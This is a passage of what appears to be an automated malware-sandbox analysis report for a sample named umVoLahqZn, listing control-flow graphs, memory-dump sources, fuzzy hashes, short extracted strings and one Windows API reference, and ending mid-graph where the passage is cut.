                                control_flow_graph 1070 1538370-15383a6 1199 15383a8 call 1538370 1070->1199 1200 15383a8 call 15384c0 1070->1200 1201 15383a8 call 1537d58 1070->1201 1202 15383a8 call 1537d48 1070->1202 1071 15383ae-15383b4 1072 15383b6-15383ba 1071->1072 1073 1538404-1538408 1071->1073 1074 15383c9-15383d0 1072->1074 1075 15383bc-15383c1 1072->1075 1076 153840a-1538419 1073->1076 1077 153841f-1538433 1073->1077 1078 15384a6-15384b0 1074->1078 1079 15383d6-15383dd 1074->1079 1075->1074 1080 1538445-153844f 1076->1080 1081 153841b-153841d 1076->1081 1196 1538435 call 153d303 1077->1196 1197 1538435 call 153d316 1077->1197 1091 15384b2-15384e3 1078->1091 1092 1538476-153849f 1078->1092 1079->1073 1085 15383df-15383e3 1079->1085 1083 1538451-1538457 1080->1083 1084 1538459-153845d 1080->1084 1082 153843b-1538442 1081->1082 1086 1538465-1538474 1083->1086 1084->1086 1087 153845f 1084->1087 1089 15383f2-15383f9 1085->1089 1090 15383e5-15383ea 1085->1090 1086->1092 1087->1086 1089->1078 1093 15383ff-1538402 1089->1093 1090->1089 1094 15384e5-15384eb 1091->1094 1095 15384ee-153850e 1091->1095 1092->1078 1093->1082 1094->1095 1101 1538510 1095->1101 1102 1538515-153851c 1095->1102 1104 15388a4-15388ad 1101->1104 1105 153851e-1538529 1102->1105 1107 15388b5-15388c5 1105->1107 1108 153852f-1538542 1105->1108 1111 1538544-1538552 1108->1111 1112 1538558-1538573 1108->1112 1111->1112 1115 153882c-1538833 1111->1115 1116 1538597-153859a 1112->1116 1117 1538575-153857b 1112->1117 1115->1104 1120 1538835-1538837 1115->1120 1121 15385a0-15385a3 1116->1121 1122 15386f4-15386fa 1116->1122 1118 1538584-1538587 1117->1118 1119 153857d 1117->1119 1124 15385ba-15385c0 1118->1124 1125 1538589-153858c 1118->1125 1119->1118 1119->1122 1123 15387e6-15387e9 1119->1123 1119->1124 1126 1538846-153884c 1120->1126 1127 1538839-153883e 1120->1127 1121->1122 1129 15385a9-15385af 1121->1129 1122->1123 1128 1538700-1538705 1122->1128 1131 15388b0 1123->1131 1132 15387ef-15387f5 1123->1132 1133 15385c2-15385c4 1124->1133 1134 15385c6-15385c8 1124->1134 1135 1538592 1125->1135 1136 1538626-153862c 1125->1136 1126->1107 1137 153884e-1538853 1126->1137 1127->1126 1128->1123 1129->1122 1130 15385b5 1129->1130 1130->1123 1131->1107 1139 15387f7-15387ff 1132->1139 1140 153881a-153881e 1132->1140 1141 15385d2-15385db 1133->1141 1134->1141 1135->1123 1136->1123 1138 1538632-1538638 1136->1138 1142 1538855-153885a 1137->1142 1143 1538898-153889b 1137->1143 1145 153863a-153863c 1138->1145 1146 153863e-1538640 1138->1146 1139->1107 1147 1538805-1538814 1139->1147 1140->1115 1150 1538820-1538826 1140->1150 1148 15385ee-1538616 1141->1148 1149 15385dd-15385e8 1141->1149 1142->1131 1144 153885c 1142->1144 1143->1131 1151 153889d-15388a2 1143->1151 1152 1538863-1538868 1144->1152 1153 153864a-1538661 1145->1153 1146->1153 1147->1112 1147->1140 1171 153870a-1538740 1148->1171 1172 153861c-1538621 1148->1172 1149->1123 1149->1148 1150->1105 1150->1115 1151->1104 1151->1120 1154 153888a-153888c 1152->1154 1155 153886a-153886c 1152->1155 1164 1538663-153867c 1153->1164 1165 153868c-15386b3 1153->1165 1154->1131 1162 153888e-1538891 1154->1162 1159 153887b-1538881 1155->1159 1160 153886e-1538873 1155->1160 1159->1107 1163 1538883-1538888 1159->1163 1160->1159 1162->1143 1163->1154 1167 153885e-1538861 1163->1167 1164->1171 1177 1538682-1538687 1164->1177 1165->1131 1176 15386b9-15386bc 1165->1176 1167->1131 1167->1152 1178 1538742-1538746 1171->1178 1179 153874d-1538755 1171->1179 1172->1171 1176->1131 1180 15386c2-15386eb 1176->1180 1177->1171 1181 1538765-1538769 1178->1181 1182 1538748-153874b 1178->1182 1179->1131 1183 153875b-1538760 1179->1183 1180->1171 1195 15386ed-15386f2 1180->1195 1184 153876b-1538771 1181->1184 1185 1538788-153878c 1181->1185 1182->1179 1182->1181 1183->1123 1184->1185 1187 1538773-153877b 1184->1187 1188 1538796-15387b5 call 1538a98 1185->1188 1189 153878e-1538794 1185->1189 1187->1131 1190 1538781-1538786 1187->1190 1192 15387bb-15387bf 1188->1192 1189->1188 1189->1192 1190->1123 1192->1123 1193 15387c1-15387dd 1192->1193 1193->1123 1195->1171 1196->1082 1197->1082 1199->1071 1200->1071 1201->1071 1202->1071
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q$(o]q$(o]q$,aq$,aq
                                • API String ID: 0-615190528
                                • Opcode ID: cfd9e4f5d72c187bef2fc289e86425d162d2fdee17755b8f778722bb6d6452ae
                                • Instruction ID: c8ae3aa8e635a17b1b5fd02cbc5dd0321aed8cf7a22585c48c9548a629d75c26
                                • Opcode Fuzzy Hash: cfd9e4f5d72c187bef2fc289e86425d162d2fdee17755b8f778722bb6d6452ae
                                • Instruction Fuzzy Hash: 9A024B70A00209DFDB19CF69D884AAEBBF6FF88300F188669F505AB365D731E951CB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1469 7c54535-7c54797 1497 7c567fd-7c56aab 1469->1497 1498 7c5479d-7c554b0 1469->1498 1565 7c56ab1-7c57988 1497->1565 1566 7c57990-7c5892a 1497->1566 1896 7c554b6-7c55828 1498->1896 1897 7c55830-7c567f5 1498->1897 1565->1566 2127 7c58cb0-7c58cc3 1566->2127 2128 7c58930-7c58ca8 1566->2128 1896->1897 1897->1497 2133 7c59305-7c5a197 2127->2133 2134 7c58cc9-7c592fd 2127->2134 2128->2127 2516 7c5a197 call 7c5bc1d 2133->2516 2517 7c5a197 call 7c5bc2c 2133->2517 2134->2133 2514 7c5a19d-7c5a1a4 2516->2514 2517->2514
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d88b63bd0851df776dea69e9bec91807c66cfe52914dac7327405783e5cf0e87
                                • Instruction ID: 757bfc64ac4d9b362e8f7fbe6c4298f80070fcf92b9b5ba1c9e79671c54f132a
                                • Opcode Fuzzy Hash: d88b63bd0851df776dea69e9bec91807c66cfe52914dac7327405783e5cf0e87
                                • Instruction Fuzzy Hash: 1CB30470E017298FCB28EF39D9896ACBBB2BB89305F4095E9D049A7350DB355D85CF42

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2518 7c54560-7c54797 2546 7c567fd-7c56aab 2518->2546 2547 7c5479d-7c554b0 2518->2547 2614 7c56ab1-7c57988 2546->2614 2615 7c57990-7c5892a 2546->2615 2945 7c554b6-7c55828 2547->2945 2946 7c55830-7c567f5 2547->2946 2614->2615 3176 7c58cb0-7c58cc3 2615->3176 3177 7c58930-7c58ca8 2615->3177 2945->2946 2946->2546 3182 7c59305-7c5a197 3176->3182 3183 7c58cc9-7c592fd 3176->3183 3177->3176 3565 7c5a197 call 7c5bc1d 3182->3565 3566 7c5a197 call 7c5bc2c 3182->3566 3183->3182 3563 7c5a19d-7c5a1a4 3565->3563 3566->3563
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c17def8d611b205958ca028663df5b8921130db1cfd9dd09dc2691014de4cd72
                                • Instruction ID: b424ebb38ea35102bb7d73bf4450d545d04384d9c7baaef2caf68644142f8876
                                • Opcode Fuzzy Hash: c17def8d611b205958ca028663df5b8921130db1cfd9dd09dc2691014de4cd72
                                • Instruction Fuzzy Hash: 8AB30470E017298FCB28EF39D9896ACBBB2BB89305F4095E9D049A7350DB355D85CF42

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 4521 7c34a58-7c3a216 call 7c3bda9 5473 7c3a21c-7c3a223 4521->5473
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727896490.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c30000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f57cf8ee7df6fc9f50bb001ff553133453461d3560f045985c753e0e76cc99e8
                                • Instruction ID: 4569dfa010aacd5807a5faa141bdedfbc32066323302eb5b32348449846b7e0f
                                • Opcode Fuzzy Hash: f57cf8ee7df6fc9f50bb001ff553133453461d3560f045985c753e0e76cc99e8
                                • Instruction Fuzzy Hash: 58B3E870A1121A8FCB58EF39E98966CBBF2FB88304F4085E9D488A7250DF345D95DF85

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 5475 7e2c1d8-7e2c1fd 5476 7e2c204-7e2c228 5475->5476 5477 7e2c1ff 5475->5477 5478 7e2c229 5476->5478 5477->5476 5479 7e2c230-7e2c24c 5478->5479 5480 7e2c255-7e2c256 5479->5480 5481 7e2c24e 5479->5481 5494 7e2c47b-7e2c484 5480->5494 5481->5478 5481->5480 5482 7e2c281-7e2c292 5481->5482 5483 7e2c385 5481->5483 5484 7e2c34a-7e2c37d call 7e2a518 5481->5484 5485 7e2c2a8-7e2c2b0 5481->5485 5486 7e2c3ae-7e2c3b1 5481->5486 5487 7e2c2ee-7e2c306 5481->5487 5488 7e2c46d-7e2c476 5481->5488 5489 7e2c332-7e2c345 5481->5489 5490 7e2c3d0-7e2c3e8 5481->5490 5491 7e2c456-7e2c468 5481->5491 5492 7e2c41b-7e2c44e call 7e25b68 5481->5492 5493 7e2c25b-7e2c27f 5481->5493 5481->5494 5513 7e2c2b2-7e2c2b4 5482->5513 5514 7e2c294-7e2c2a6 5482->5514 5498 7e2c38e-7e2c3a9 5483->5498 5484->5483 5496 7e2c2b7-7e2c2c2 5485->5496 5500 7e2c3ba-7e2c3cb 5486->5500 5509 7e2c308-7e2c317 5487->5509 5510 7e2c319-7e2c320 5487->5510 5488->5479 5489->5479 5511 7e2c3ea-7e2c3f9 5490->5511 5512 7e2c3fb-7e2c402 5490->5512 5491->5479 5492->5491 5493->5479 5505 7e2c2c4-7e2c2d3 5496->5505 5506 7e2c2d5-7e2c2dc 5496->5506 5498->5479 5500->5479 5508 7e2c2e3-7e2c2e9 5505->5508 5506->5508 5508->5479 5516 7e2c327-7e2c32d 5509->5516 5510->5516 5517 7e2c409-7e2c416 5511->5517 5512->5517 5513->5496 5514->5479 5516->5479 5517->5479
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: e\1$e\1$"*p$"*p
                                • API String ID: 0-1513742261
                                • Opcode ID: 87e7359f323dedb865ff8b001a8155370d7c4887b2d734647673ec7100522281
                                • Instruction ID: cc248d71f03286f777c493d897c355e55a8f7c502f0e70966ebd54fe2cc3b96a
                                • Opcode Fuzzy Hash: 87e7359f323dedb865ff8b001a8155370d7c4887b2d734647673ec7100522281
                                • Instruction Fuzzy Hash: D481E4B0D152298FCB14CFE5D9446EEBBF2BF89300F20942AD416BB254DB345A42DF68
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f$6f$$]q
                                • API String ID: 0-3010377955
                                • Opcode ID: 926c3823156098b13de61431d3cbfa24934d3ea65c7aa208ec847380975c3e5b
                                • Instruction ID: 073034bf74a37d1960c1711bb485016a9d9b2b378b26a6df8e0f1eec201a3a17
                                • Opcode Fuzzy Hash: 926c3823156098b13de61431d3cbfa24934d3ea65c7aa208ec847380975c3e5b
                                • Instruction Fuzzy Hash: A77113B4E00219DFDB48DFA5D5845DEBBB2FF89700F20802AE406AB354DB305946DF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q$Haq
                                • API String ID: 0-903699183
                                • Opcode ID: 91854fee9e122c34b9647e9524b18be3033aaac0df089f42faa5d160e869c1aa
                                • Instruction ID: 05ecd3dc6014a0ae78e783f8a0d2c88ff96a1450f83b359e20929c71c2a11ccf
                                • Opcode Fuzzy Hash: 91854fee9e122c34b9647e9524b18be3033aaac0df089f42faa5d160e869c1aa
                                • Instruction Fuzzy Hash: E9127FB0A002199FDB19DF69C844AAEBBF6FFC8300F248559E445DB3A5DB349D42CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: Xaq$$]q
                                • API String ID: 0-1280934391
                                • Opcode ID: 409ea48c01d4c03d02b52655b5e2be9a60f6419a851250cb599888c153e93753
                                • Instruction ID: 8254b8b79f471dc55f7450d9ea58d70f67ef3c15d63948f9198d1560ffeeb953
                                • Opcode Fuzzy Hash: 409ea48c01d4c03d02b52655b5e2be9a60f6419a851250cb599888c153e93753
                                • Instruction Fuzzy Hash: 4CB1F474B042159FDB18AF79989463E7BF7BFC9710B04892AE406DF398DE34C8028792
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: Te]q$Te]q
                                • API String ID: 0-3320153681
                                • Opcode ID: aef86c0d4b6aa21ad010d041cb9891196a4fd919ef0e39d68e17a3e559577664
                                • Instruction ID: d66bf5e5d7c81a6b45f96cbff1f1255fff29d11837f16ce65b9ce4cb9ea94202
                                • Opcode Fuzzy Hash: aef86c0d4b6aa21ad010d041cb9891196a4fd919ef0e39d68e17a3e559577664
                                • Instruction Fuzzy Hash: BA91D3B4E042098FDB18CFAAC9909DEFBB2BF89300F14942AE415BB354D7349946CB60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: Te]q$Te]q
                                • API String ID: 0-3320153681
                                • Opcode ID: c079804e1f724a9330894f025ba9bfab31eb051edc9a243abbfbda44f62d218e
                                • Instruction ID: 98223087e935540e8cd080c50900d3008ce481f94ebba843165cacf093e0584f
                                • Opcode Fuzzy Hash: c079804e1f724a9330894f025ba9bfab31eb051edc9a243abbfbda44f62d218e
                                • Instruction Fuzzy Hash: A191C2B4E102198FCB18CFEAC590ADEFBB2BF89310F14942AE415BB354D73499468F54
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f$$]q
                                • API String ID: 0-403443862
                                • Opcode ID: 95bf7d9f11f9c8dd73167985a787e9335285410c07599fdcf322ba80b5d26de2
                                • Instruction ID: 0213b76068e0ba6885eb7dc7dea413a2411d2cbea8798b619e199bfe21bf846e
                                • Opcode Fuzzy Hash: 95bf7d9f11f9c8dd73167985a787e9335285410c07599fdcf322ba80b5d26de2
                                • Instruction Fuzzy Hash: F47114B4E00219DFDB48DFA9D58499EBBF2FF89700F20852AE406A7364DB305946DF50
                                APIs
                                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07E2BDC3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: CreateProcessUser
                                • String ID:
                                • API String ID: 2217836671-0
                                • Opcode ID: b9ed6832f0808ff6ffdbca14316f2a051a079b4c4070e03d129fe8d2a2edbbf3
                                • Instruction ID: a0401943a829f50ca7145a7161cadab1272392ba6b1d4b38a17c157a2e205b40
                                • Opcode Fuzzy Hash: b9ed6832f0808ff6ffdbca14316f2a051a079b4c4070e03d129fe8d2a2edbbf3
                                • Instruction Fuzzy Hash: 6651F7B190022ADFDB24CF59C840BDDBBB5BF48314F0484AAE919B7250DB759A85DF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: kQD
                                • API String ID: 0-3066535408
                                • Opcode ID: b43fa0e5debef74b473d769428584ae8ca640c120cb8a8255248660d5fce7f8b
                                • Instruction ID: 4df5fd60a5e7306bb401ec39d161163c73bdcdb6e17dff0823f2f409a75d2cb6
                                • Opcode Fuzzy Hash: b43fa0e5debef74b473d769428584ae8ca640c120cb8a8255248660d5fce7f8b
                                • Instruction Fuzzy Hash: D7C128B4D1521ADFCB14CF9AD9808AEFBB2FF89300F148559E515AB314D734AA42CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: >NG
                                • API String ID: 0-1926143806
                                • Opcode ID: 8bb39dd053c27925cc3b0e4a2b5f52b7304b032964d3883563931c2452d650b2
                                • Instruction ID: a61d18557e4413e36c5c7b0a6f33a376b47b7feae55abf383706a63e07bc69e5
                                • Opcode Fuzzy Hash: 8bb39dd053c27925cc3b0e4a2b5f52b7304b032964d3883563931c2452d650b2
                                • Instruction Fuzzy Hash: 43613FB0E152198FCB18CFA9D4406EEFBF2BF89311F14C16AE51AB7254D7349A41CBA4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 95f18ee27c45d5760a280044ee98d5276ea9fd5d2770f08cf91fe6d24483acb0
                                • Instruction ID: de7bda8954d888cde4588ce72e521730d51add1126756c139221e3917060d319
                                • Opcode Fuzzy Hash: 95f18ee27c45d5760a280044ee98d5276ea9fd5d2770f08cf91fe6d24483acb0
                                • Instruction Fuzzy Hash: EEC28070E102299BCB24EF79D8857ADBBB6FB89304F4085A9D44DA7340DE389D85CF52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: <
                                • API String ID: 0-4251816714
                                • Opcode ID: e7b40c90cb797827534a018be66589303b45dcb7acb0718ac1d0783baf2a0d98
                                • Instruction ID: 173b7604b802bed39642427d7ff57da3bf23adda07a854358d45b25b2fadbf4e
                                • Opcode Fuzzy Hash: e7b40c90cb797827534a018be66589303b45dcb7acb0718ac1d0783baf2a0d98
                                • Instruction Fuzzy Hash: D75193B1E016588FDB59CFAAC9446DDBBF2AFC9301F14C0AAD409AB264DB345A85CF40
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727211850.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6520000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f65ee6cdd612c5dc1f418127e60b6fd96e0fbec65b923eea101cd2a373ca2c5
                                • Instruction ID: f52add5076432a9104789a47283a81804d8818aadb19f52d91e515afcfab7936
                                • Opcode Fuzzy Hash: 7f65ee6cdd612c5dc1f418127e60b6fd96e0fbec65b923eea101cd2a373ca2c5
                                • Instruction Fuzzy Hash: 37525A34A003568FCB14DF28C944B99B7F2FF8A314F2586A9D4586F2A1DB71AD86CF41
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727211850.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6520000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44914695ce9579b5e8233844d1ef2939ce29273735d8ce6a1af87a5a33ce6c82
                                • Instruction ID: f5c5794c23635b6fd3cd1cafe27afb8fd333c2240dd8dac00a45fe1dfe493007
                                • Opcode Fuzzy Hash: 44914695ce9579b5e8233844d1ef2939ce29273735d8ce6a1af87a5a33ce6c82
                                • Instruction Fuzzy Hash: 54525C34A003568FCB14DF28C944B99B7F2FF86314F2586A9D4586F2A1DB71AD86CF81
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fc335a491ed1f348f3b3061eb8eee8d383715cd890092cf5c3c3316be9c9a959
                                • Instruction ID: 53db607606db631d4c57072fd1d409290b6a0025799745038c17efe227df5cb4
                                • Opcode Fuzzy Hash: fc335a491ed1f348f3b3061eb8eee8d383715cd890092cf5c3c3316be9c9a959
                                • Instruction Fuzzy Hash: A0F129B4A1526A8FCB64CF29C84479DBBB6FF88340F1495EAD40AA7354D7709E82DF04
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b63a09c5a195e23d98f1f0437da65411881adcac8f0a27047adb387f77f87f3a
                                • Instruction ID: ddd3fa32b9e7cedf471ea72073da16263fd43f8f274b453f2008debaf205e490
                                • Opcode Fuzzy Hash: b63a09c5a195e23d98f1f0437da65411881adcac8f0a27047adb387f77f87f3a
                                • Instruction Fuzzy Hash: CC518E30B006048FD7289F7AD8947AE7BA6FBC8710F198869D50A9F3A4DE749C45CB91
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 154fdb095a7a4037769bae26509de16057d4408e1eb07725d649e4d7b7dc24fa
                                • Instruction ID: e4e95b8ad6c23e3d5b8233abb333272d2eb6038d8ce532f53301812acf4e6686
                                • Opcode Fuzzy Hash: 154fdb095a7a4037769bae26509de16057d4408e1eb07725d649e4d7b7dc24fa
                                • Instruction Fuzzy Hash: BB616AB0D12229DFCB08CFA5D9446EEBBB1FF49340F109629E412AB350C7745A46EF55
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0672f66349dd9f7595c95cf269ac1ba56efff91bca2c6b6ac4b70bdf03f8bd2
                                • Instruction ID: 7abcd0b2ece26f54d99ee37465b480d9224365f315bd15e6b4af3b22f6f00031
                                • Opcode Fuzzy Hash: a0672f66349dd9f7595c95cf269ac1ba56efff91bca2c6b6ac4b70bdf03f8bd2
                                • Instruction Fuzzy Hash: 8B51A0B0D12229DFCB08CFA5D8446EEBBB1FF49340F10952AE412AB350C7349A06DF54
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 811a71cf466f4c3aa1a19e54d21072914c1bdb6be44e99c073c32357361b4d85
                                • Instruction ID: 1f5ede5067c6ecda86c6bf618bd35ef08cb0037c6c16a486dcf9a5c5235f07fb
                                • Opcode Fuzzy Hash: 811a71cf466f4c3aa1a19e54d21072914c1bdb6be44e99c073c32357361b4d85
                                • Instruction Fuzzy Hash: 0A511CB0D01258CFDB28CFA6D8846DEBBB2FF89710F1484A9E50967354DB345A85CF51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0ee52efdf836774cb50274c27cadbdc2648feb2ca8f971b5e70580c80d285417
                                • Instruction ID: de38100e5e36559193eeff1d70dfa67133f2051600fe44bcbfe2335a6c1cf1fd
                                • Opcode Fuzzy Hash: 0ee52efdf836774cb50274c27cadbdc2648feb2ca8f971b5e70580c80d285417
                                • Instruction Fuzzy Hash: 7421AAB1E116188BEB58CF6BDC4069EFBF7BFC9200F04C1BAD508A6264DB341A568F51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 1538a98-1538acd 1 1538ad3-1538af6 0->1 2 1538efc-1538f00 0->2 11 1538ba4-1538ba8 1->11 12 1538afc-1538b09 1->12 3 1538f02-1538f16 2->3 4 1538f19-1538f27 2->4 9 1538f29-1538f3e 4->9 10 1538f98-1538fad 4->10 18 1538f40-1538f43 9->18 19 1538f45-1538f52 9->19 20 1538fb4-1538fc1 10->20 21 1538faf-1538fb2 10->21 15 1538bf0-1538bf9 11->15 16 1538baa-1538bb8 11->16 25 1538b0b-1538b16 12->25 26 1538b18 12->26 22 153900f 15->22 23 1538bff-1538c09 15->23 16->15 32 1538bba-1538bd5 16->32 27 1538f54-1538f95 18->27 19->27 28 1538fc3-1538ffe 20->28 21->28 33 1539014-1539021 22->33 23->2 29 1538c0f-1538c18 23->29 34 1538b1a-1538b1c 25->34 26->34 71 1539005-153900c 28->71 30 1538c27-1538c33 29->30 31 1538c1a-1538c1f 29->31 30->33 39 1538c39-1538c3f 30->39 31->30 57 1538be3 32->57 58 1538bd7-1538be1 32->58 34->11 41 1538b22-1538b84 34->41 42 1538ee6-1538eea 39->42 43 1538c45-1538c55 39->43 84 1538b86 41->84 85 1538b8a-1538ba1 41->85 42->22 48 1538ef0-1538ef6 42->48 55 1538c57-1538c67 43->55 56 1538c69-1538c6b 43->56 48->2 48->29 59 1538c6e-1538c74 55->59 56->59 60 1538be5-1538be7 57->60 58->60 59->42 66 1538c7a-1538c89 59->66 60->15 67 1538be9 60->67 68 1538d37-1538d62 call 15388e0 * 2 66->68 69 1538c8f 66->69 67->15 86 1538d68-1538d6c 68->86 87 1538e4c-1538e66 68->87 73 1538c92-1538ca3 69->73 73->33 75 1538ca9-1538cbb 73->75 75->33 76 1538cc1-1538cd9 75->76 140 1538cdb call 153c360 76->140 141 1538cdb call 153c388 76->141 80 1538ce1-1538cf1 80->42 83 1538cf7-1538cfa 80->83 88 1538d04-1538d07 83->88 89 1538cfc-1538d02 83->89 84->85 85->11 86->42 90 1538d72-1538d76 86->90 87->2 107 1538e6c-1538e70 87->107 88->22 91 1538d0d-1538d10 88->91 89->88 89->91 94 1538d78-1538d85 